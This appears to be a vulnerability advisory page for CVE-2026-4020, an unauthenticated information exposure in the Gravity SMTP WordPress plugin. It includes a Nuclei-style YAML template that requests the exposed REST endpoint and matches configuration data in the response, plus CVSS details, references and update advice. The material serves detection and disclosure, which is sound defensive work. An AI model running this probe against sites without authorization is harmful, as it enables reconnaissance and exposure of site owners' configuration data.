Gravity SMTP WordPress Plugin - Sensitive Information Exposure

CVE-2026-4020
Verified

Description

The Gravity SMTP WordPress plugin, versions <= 2.1.4, exposes sensitive information through an unrestricted REST API endpoint at /wp-json/gravitysmtp/v1/tests/mock-data. Unauthenticated attackers can retrieve detailed system configuration data from it; exploitation requires no authentication.

Severity

High

CVSS Score

7.5

Exploit Probability

14%

Affected Product

gravitysmtp

Published Date

March 31, 2026

Template Author

theamanrawat

CVE-2026-4020.yaml
id: CVE-2026-4020

info:
  name: Gravity SMTP WordPress Plugin - Sensitive Information Exposure
  author: theamanrawat
  severity: high
  description: |
    Gravity SMTP WordPress plugin <= 2.1.4 contains a sensitive information exposure caused by an unrestricted REST API endpoint at /wp-json/gravitysmtp/v1/tests/mock-data, letting unauthenticated attackers retrieve detailed system configuration data, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access detailed system and configuration data, potentially aiding further attacks or information leakage.
  remediation: |
    Update to the latest version beyond 2.1.4.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-gravity-smtp-plugin-2-1-4-unauthenticated-sensitive-information-exposure-via-rest-api-vulnerability
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/12a296db-ecc0-409b-8718-0c208504053a?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2026-4020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-200
    cve-id: CVE-2026-4020
    epss-score: 0.13532
    epss-percentile: 0.94313
  metadata:
    max-request: 1
    verified: true
    vendor: rocketgenius
    product: gravitysmtp
    framework: wordpress
  tags: cve,cve2026,exposure,wordpress,wp-plugin,gravitysmtp,wp,unauthenticated,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "gravitysmtp_admin_config"
          - "system_report_clipboard"
          - "feature_flags"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c3baab896c8688615735bddb6ef150d24426fd732f7593594b9ed6ed162ea1d6022100c727f3dcece01680c9fe6d4e39ff4cad75638dbc6861da0e67b8f097f2215a02:922c64590222798bb761d5b6d8e72950
CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2026-4020
CWE ID: CWE-200

References

https://patchstack.com/database/vulnerability/wordpress-gravity-smtp-plugin-2-1-4-unauthenticated-sensitive-information-exposure-via-rest-api-vulnerability
https://www.wordfence.com/threat-intel/vulnerabilities/id/12a296db-ecc0-409b-8718-0c208504053a?source=cve
https://nvd.nist.gov/vuln/detail/CVE-2026-4020

Remediation Steps

Update to the latest version beyond 2.1.4.